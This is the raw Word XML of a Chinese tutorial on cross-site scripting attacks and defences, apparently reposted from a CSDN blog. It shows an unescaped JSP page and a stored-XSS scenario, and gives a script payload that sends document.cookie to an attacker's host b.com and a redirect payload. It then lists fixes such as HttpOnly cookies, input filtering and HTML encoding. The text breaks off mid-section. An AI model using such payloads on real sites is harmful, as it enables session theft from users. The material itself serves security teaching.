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B5BB" w14:textId="77777777" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00CB71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Pr="00CB7171">
          <w:rPr>
            <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:color w:val="000000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
          </w:rPr>
          <w:t>XSS攻击及防御</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AA5C52F" w14:textId="51FD0582" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00CB7171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B7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本文来自：</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CB7171">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>高爽</w:t>
        </w:r>
        <w:r w:rsidRPr="00CB7171">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>|Coder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，原文地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00CB7171">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/ghsau/article/details/17027893</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，转载请注明。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br/>
        <w:t>       XSS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又称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CSS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，全称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Cross SiteScript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，跨站脚本攻击，其原理是攻击者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向有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XSS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漏洞的网站中输入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(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传入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)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恶意的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HTML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代码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，当其它用户浏览该网站时，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这段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HTML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代码会</w:t>
      </w:r>
      <w:r w:rsidR="00E302F3" w:rsidRPr="00A57311">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="393939"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>被浏览器成功的执行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，从而达到攻击的目的。如，盗取用户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Cookie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、破坏页面结构、重定向到其它网站等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A9EBF" w14:textId="77777777" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00417192">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="t0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>XSS攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8FD33" w14:textId="2A61A570" w:rsidR="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00417192">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:firstLine="540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CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XSS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攻击类似于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SQL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注入攻击，攻击之前，我们先找到一个存在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XSS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漏洞的网站，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XSS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漏洞分为两种，一种是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DOM Based XSS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漏洞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另一种是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Stored XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞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。理论上，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所有可输入的地方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没有对输入数据进行处理的话，都会存在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XSS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漏洞，漏洞的危害取决于攻击代码的威力，攻击代码也不局限于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script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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F165216" w14:textId="77777777" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00417192">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="t1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>DOM Based XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7657F78C" w14:textId="77777777" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00CB7171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B7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       DOM Based XSS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是一种基于网页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DOM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结构的攻击，该攻击特点是中招的人是少数人。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C0A2BB" w14:textId="77777777" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00CB7171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B7171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CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>场景一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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FB6ED" w14:textId="77777777" w:rsidR="00CB7171" w:rsidRPr="00CB7171" w:rsidRDefault="00CB7171" w:rsidP="00CB7171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CB7171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当我登录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a.com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后，我发现它的页面某些内容是根据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url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中的一个叫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content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参数直接显示的，猜测它测页面处理可能是这样，其它语言类似：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB7171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0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3"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w14:paraId="716B281D" w14:textId="77777777" w:rsidTr="00D45D96">
        <w:trPr>
          <w:trHeight w:val="113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49A9BD55" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005E4A99">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:beforeLines="50" w:before="163" w:afterLines="50" w:after="163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BF5F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;%@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page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5F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="7F007F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>language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5F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"java" </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="7F007F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>contentType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5F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"text/html; charset=UTF-8" </w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="7F007F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>pageEncoding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=</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"UTF-8"</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="BF5F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FD149C3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&lt;!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DOCTYPE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html</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="808080"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PUBLIC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"-//W3C//DTD HTML 4.01 Transitional//EN"</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="3F7F5F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"http://www.w3.org/TR/html4/loose.dtd"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6B07762F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html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184DD9B2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   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head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7DA53570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      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title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XSS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测试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&lt;/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title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45FFF73C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   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&lt;/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head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07BC81DB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   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body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65CE65DB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 xml:space="preserve">       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页面内容：</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="BF5F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;%=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request.getParameter(</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"content"</w:t>
            </w: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)</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="BF5F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>%&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A265E59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  <w:t>    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&lt;/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body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  <w:p w14:paraId="6CFE435D" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005E4A99">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="160" w:lineRule="exact"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pP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&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="3F7F7F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r w:rsidRPr="005F7FE5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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 w14:paraId="36EEDEF1" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7F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65C9E7" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7F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我知道了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也注册了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该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网站，并且知道了他的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邮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箱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或者其它能接收信息的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联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系方式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，我做一个超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发给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他，超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接地址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为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：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http://www.a.com?</w:t>
      </w:r>
      <w:r w:rsidRPr="005F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>content=&lt;script&gt;window.open(“www.b.com?param=”+document.cookie)&lt;/script&gt;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，当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点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击这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个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链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接的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候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假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设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他已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经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登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录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a.com)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浏览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器就会直接打开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b.com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，并且把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a.com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中的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cookie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信息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发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送到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b.com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b.com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是我搭建的网站，当我的网站接收到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该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信息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时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，我就盗取了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a.com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cookie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信息，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cookie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信息中可能存有登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录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密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码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，攻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击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成功！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个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程中，受害者只有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Tom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自己。那当我在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浏览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器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a.com?content=&lt;script&gt;alert(“xss”)&lt;/script&gt;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浏览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器展示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页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面内容的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过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程中，就会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执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行我的脚本，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页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面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输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出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xss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字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样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这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是攻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击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了我自己，那我如何攻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击别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人并且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获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利呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B006CB2" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="00417192">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei" w:eastAsia="Microsoft YaHei" w:hAnsi="Microsoft YaHei" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stored XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56C2CE" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5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F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       Stored XSS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是存储式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XSS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漏洞，由于其攻击代码已经存储到服务器上或者数据库中，所以受害者是很多人。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C2005" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5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F7FE5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5F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>场景二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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE528B8" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5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F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       a.com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可以发文章，我登录后在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a.com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中发布了一篇文章，文章中包含了恶意代码，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&lt;script&gt;window.open(“www.b.com?param=”+document.cookie)&lt;/script&gt;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，保存文章。这时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Tom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Jack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看到了我发布的文章，当在查看我的文章时就都中招了，他们的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cookie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信息都发送到了我的服务器上，攻击成功！这个过程中，受害者是多个人。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br/>
        <w:t>       Stored XSS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漏洞危害性更大，危害面更广。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371BF1A3" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="A5A5A5"/>
        <w:spacing w:before="150" w:after="15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</w:pPr>
      <w:bookmarkStart w:id="2" w:name="t3"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="001E762A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 xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4611CD63" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567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原则：　不相信客户输入的数据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br/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注意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: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攻击代码不一定在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&lt;script&gt;&lt;/script&gt;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中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34011A45" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="87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将重要的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cookie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标记为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http only,   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这样的话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Javascript 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中的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document.cookie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语句就不能获取到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cookie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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29599199" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="87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只允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户输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入我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们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期望的数据。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例如：　年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龄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textbox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中，只允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许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户输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入数字。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而数字之外的字符都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过滤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掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C336DD3" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="870"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对数据进行</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Html Encode </w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C09304A" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="87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过滤或移除特殊的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Html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标签，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例如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>: &lt;script&gt;, &lt;iframe&gt; ,  &amp;lt; for &lt;, &amp;gt; for &gt;, &amp;quot for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E4B71" w14:textId="77777777" w:rsidR="006A0567" w:rsidRPr="001E762A" w:rsidRDefault="006A0567" w:rsidP="006A0567">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="87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过滤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JavaScript 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事件的</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:cs="SimSun"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标签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。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A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"onclick=", "onfocus" </w:t>
      </w:r>
      <w:r w:rsidRPr="001E762A">
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ACD777" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5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5F7FE5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永远不相信用户的输入。需要对用户的输入进行处理，只允许输入合法的值，其它值一概过滤掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2A4AE" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5">
      <w:pPr>
        <w:widowControl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</w:pPr>
      <w:bookmarkStart w:id="3" w:name="t5"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="005F7FE5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</w:rPr>
        <w:t>Html encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BFC697" w14:textId="4232D8F9" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="00C67BE6">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="005F7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>假如某些情况下，我们不能对用户数据进行严格的过滤，那我们也需要对标签进行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E96EC1" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5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  <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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比如用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户输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入：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&lt;script&gt;window.location.href=”http://www.baidu.com”;&lt;/script&gt;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，保存后最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终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存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储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的会是：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&amp;lt;script&amp;gt;window.location.href=&amp;quot;http://www.baidu.com&amp;quot;&amp;lt;/script&amp;gt;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在展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现时浏览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器会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对这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些字符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转换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成文本内容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显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示，而不是一段可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执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行的代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码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5BCA0F87" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7FE5">
      <w:pPr>
        <w:widowControl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</w:rPr>
        <w:t>       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下面提供两种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</w:rPr>
        <w:t>Html encode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的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C294B2" w14:textId="77777777" w:rsidR="005F7FE5" w:rsidRPr="005F7FE5" w:rsidRDefault="005F7FE5" w:rsidP="005F7F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</w:rPr>
        <w:t>Apache</w:t>
      </w:r>
